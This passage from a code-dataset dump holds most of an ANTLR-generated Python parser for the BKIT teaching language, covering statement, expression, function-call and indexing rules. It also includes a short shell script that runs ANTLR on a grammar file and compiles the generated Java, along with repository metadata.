1)\n self.state = 295\n self.match(BKITParser.BREAK)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Continue_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def CONTINUE(self):\n return self.getToken(BKITParser.CONTINUE, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_continue_stmt\n\n\n\n\n def continue_stmt(self):\n\n localctx = BKITParser.Continue_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 48, self.RULE_continue_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 297\n self.match(BKITParser.CONTINUE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Call_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_call_stmt\n\n\n\n\n def call_stmt(self):\n\n localctx = BKITParser.Call_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 50, self.RULE_call_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 299\n self.function_call()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Return_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def RETURN(self):\n return self.getToken(BKITParser.RETURN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_return_stmt\n\n\n\n\n def return_stmt(self):\n\n localctx = BKITParser.Return_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 52, self.RULE_return_stmt)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 301\n self.match(BKITParser.RETURN)\n self.state = 303\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 302\n self.expr()\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Init_forContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def scalar_var(self):\n return self.getTypedRuleContext(BKITParser.Scalar_varContext,0)\n\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_init_for\n\n\n\n\n def init_for(self):\n\n localctx = BKITParser.Init_forContext(self, self._ctx, self.state)\n self.enterRule(localctx, 54, self.RULE_init_for)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 305\n self.scalar_var()\n self.state = 306\n self.match(BKITParser.ASSIGN)\n self.state = 307\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Con_forContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_con_for\n\n\n\n\n def con_for(self):\n\n localctx = BKITParser.Con_forContext(self, self._ctx, self.state)\n self.enterRule(localctx, 56, self.RULE_con_for)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 309\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Update_forContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_update_for\n\n\n\n\n def update_for(self):\n\n localctx = BKITParser.Update_forContext(self, self._ctx, self.state)\n self.enterRule(localctx, 58, self.RULE_update_for)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 311\n self.expr()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ExprContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr1(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr1Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr1Context,i)\n\n\n def EQUAL(self):\n return self.getToken(BKITParser.EQUAL, 0)\n\n def NOT_EQUAL_INT(self):\n return self.getToken(BKITParser.NOT_EQUAL_INT, 0)\n\n def LESS_INT(self):\n return self.getToken(BKITParser.LESS_INT, 0)\n\n def GREATER_INT(self):\n return self.getToken(BKITParser.GREATER_INT, 0)\n\n def LESS_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_INT, 0)\n\n def GREATER_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_INT, 0)\n\n def NOT_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.NOT_EQUAL_FLOAT, 0)\n\n def LESS_FLOAT(self):\n return self.getToken(BKITParser.LESS_FLOAT, 0)\n\n def GREATER_FLOAT(self):\n return self.getToken(BKITParser.GREATER_FLOAT, 0)\n\n def LESS_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_FLOAT, 0)\n\n def GREATER_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr\n\n\n\n\n def expr(self):\n\n localctx = BKITParser.ExprContext(self, self._ctx, self.state)\n self.enterRule(localctx, 60, self.RULE_expr)\n self._la = 0 # Token type\n try:\n self.state = 318\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,22,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 313\n self.expr1(0)\n self.state = 314\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.EQUAL) | (1 << BKITParser.NOT_EQUAL_INT) | (1 << BKITParser.LESS_INT) | (1 << BKITParser.GREATER_INT) | (1 << BKITParser.LESS_OR_EQUAL_INT) | (1 << BKITParser.GREATER_OR_EQUAL_INT) | (1 << BKITParser.NOT_EQUAL_FLOAT) | (1 << BKITParser.LESS_FLOAT) | (1 << BKITParser.GREATER_FLOAT) | (1 << BKITParser.LESS_OR_EQUAL_FLOAT) | (1 << BKITParser.GREATER_OR_EQUAL_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 315\n self.expr1(0)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 317\n self.expr1(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr1Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def expr1(self):\n return self.getTypedRuleContext(BKITParser.Expr1Context,0)\n\n\n def AND(self):\n return self.getToken(BKITParser.AND, 0)\n\n def OR(self):\n return self.getToken(BKITParser.OR, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n\n\n def expr1(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr1Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 62\n self.enterRecursionRule(localctx, 62, self.RULE_expr1, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 321\n self.expr2(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 328\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,23,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr1Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr1)\n self.state = 323\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 324\n _la = self._input.LA(1)\n if not(_la==BKITParser.AND or _la==BKITParser.OR):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 325\n self.expr2(0) \n self.state = 330\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,23,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def expr2(self):\n return self.getTypedRuleContext(BKITParser.Expr2Context,0)\n\n\n def PLUS_FLOAT(self):\n return self.getToken(BKITParser.PLUS_FLOAT, 0)\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 64\n self.enterRecursionRule(localctx, 64, self.RULE_expr2, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 332\n self.expr3(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 339\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,24,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 334\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 335\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.PLUS_INT) | (1 << BKITParser.PLUS_FLOAT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 336\n self.expr3(0) \n self.state = 341\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,24,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr3Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def DIV_FLOAT(self):\n return self.getToken(BKITParser.DIV_FLOAT, 0)\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def MOD(self):\n return self.getToken(BKITParser.MOD, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr3\n\n\n\n def expr3(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr3Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 66\n self.enterRecursionRule(localctx, 66, self.RULE_expr3, _p)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 343\n self.expr4()\n self._ctx.stop = self._input.LT(-1)\n self.state = 350\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,25,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr3Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr3)\n self.state = 345\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 346\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.STAR_INT) | (1 << BKITParser.DIV_INT) | (1 << BKITParser.DIV_FLOAT) | (1 << BKITParser.MOD))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 347\n self.expr4() \n self.state = 352\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,25,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr4Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def NOT(self):\n return self.getToken(BKITParser.NOT, 0)\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr4\n\n\n\n\n def expr4(self):\n\n localctx = BKITParser.Expr4Context(self, self._ctx, self.state)\n self.enterRule(localctx, 68, self.RULE_expr4)\n try:\n self.state = 356\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.NOT]:\n self.enterOuterAlt(localctx, 1)\n self.state = 353\n self.match(BKITParser.NOT)\n self.state = 354\n self.expr4()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.MINUS_INT, BKITParser.MINUS_FLOAT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 355\n self.expr5()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr5Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def expr6(self):\n return self.getTypedRuleContext(BKITParser.Expr6Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr5\n\n\n\n\n def expr5(self):\n\n localctx = BKITParser.Expr5Context(self, self._ctx, self.state)\n self.enterRule(localctx, 70, self.RULE_expr5)\n self._la = 0 # Token type\n try:\n self.state = 361\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.MINUS_INT, BKITParser.MINUS_FLOAT]:\n self.enterOuterAlt(localctx, 1)\n self.state = 358\n _la = self._input.LA(1)\n if not(_la==BKITParser.MINUS_INT or _la==BKITParser.MINUS_FLOAT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 359\n self.expr5()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 360\n self.expr6()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr6Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr6\n\n\n\n\n def expr6(self):\n\n localctx = BKITParser.Expr6Context(self, self._ctx, self.state)\n self.enterRule(localctx, 72, self.RULE_expr6)\n try:\n self.state = 367\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,28,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 363\n self.expr7()\n self.state = 364\n self.index_op()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 366\n self.expr7()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr7Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def expr8(self):\n return self.getTypedRuleContext(BKITParser.Expr8Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr7\n\n\n\n\n def expr7(self):\n\n localctx = BKITParser.Expr7Context(self, self._ctx, self.state)\n self.enterRule(localctx, 74, self.RULE_expr7)\n try:\n self.state = 371\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,29,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 369\n self.function_call()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 370\n self.expr8()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr8Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr8\n\n\n\n\n def expr8(self):\n\n localctx = BKITParser.Expr8Context(self, self._ctx, self.state)\n self.enterRule(localctx, 76, self.RULE_expr8)\n try:\n self.state = 378\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 1)\n self.state = 373\n self.operand()\n pass\n elif token in [BKITParser.LEFT_PAREN]:\n self.enterOuterAlt(localctx, 2)\n self.state = 374\n self.match(BKITParser.LEFT_PAREN)\n self.state = 375\n self.expr()\n self.state = 376\n self.match(BKITParser.RIGHT_PAREN)\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self):\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def composite_data(self):\n return self.getTypedRuleContext(BKITParser.Composite_dataContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 78, self.RULE_operand)\n try:\n self.state = 383\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID]:\n self.enterOuterAlt(localctx, 1)\n self.state = 380\n self.var_non_init()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.enterOuterAlt(localctx, 2)\n self.state = 381\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 3)\n self.state = 382\n self.composite_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_callContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_call\n\n\n\n\n def function_call(self):\n\n localctx = BKITParser.Function_callContext(self, self._ctx, self.state)\n self.enterRule(localctx, 80, self.RULE_function_call)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 385\n self.match(BKITParser.ID)\n self.state = 386\n self.match(BKITParser.LEFT_PAREN)\n self.state = 397\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.NOT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 387\n self.expr()\n self.state = 392\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 388\n self.match(BKITParser.COMMA)\n self.state = 389\n self.expr()\n self.state = 394\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 399\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 400\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Index_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACKET(self):\n return self.getToken(BKITParser.LEFT_BRACKET, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_BRACKET(self):\n return self.getToken(BKITParser.RIGHT_BRACKET, 0)\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_index_op\n\n\n\n\n def index_op(self):\n\n localctx = BKITParser.Index_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 82, self.RULE_index_op)\n try:\n self.state = 411\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,34,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 402\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 403\n self.expr()\n self.state = 404\n self.match(BKITParser.RIGHT_BRACKET)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 406\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 407\n self.expr()\n self.state = 408\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 409\n self.index_op()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[31] = self.expr1_sempred\n self._predicates[32] = self.expr2_sempred\n self._predicates[33] = self.expr3_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr1_sempred(self, localctx:Expr1Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 1:\n return self.precpred(self._ctx, 2)\n \n\n def expr3_sempred(self, localctx:Expr3Context, predIndex:int):\n if predIndex == 2:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.6402116417884827, "alphanum_fraction": 0.6560846567153931, "avg_line_length": 14.666666984558105, "blob_id": "63f8b4988373d0e177ea25cb2d03a967a2a17490", "content_id": "ae0a28bd7ea2a50080392e096d56f2ab96b7236a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 189, "license_type": "no_license", "max_line_length": 40, "num_lines": 12, "path": "/SyntaxAnalysis/gen.sh", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ $# -eq 0 ]\n\tthen \n\t\tread -p 'Grammar name : ' grammar_name\n\telse\n\t\tgrammar_name=$1\nfi\n\njava -jar $ANTLR_JAR $grammar_name.g4\njavac $grammar_name*.java\necho $grammar_name \n" } ]
83
kzmssk/cppn
https://github.com/kzmssk/cppn
e6aa202dad10c3397f8ad7d403e9d59f8775ec02
6ef32c6e05f16826635fe6cb70fc43d5f3d91b98
67e9d8c5179aa6e4ca423f96fa53e8964f06cfa7
refs/heads/master
2022-11-27T13:44:13.343063
2019-11-03T07:55:02
2019-11-03T07:55:02
211,906,839
0
0
null
2019-09-30T16:40:26
2019-11-04T08:22:24
2022-11-22T04:34:29
Python
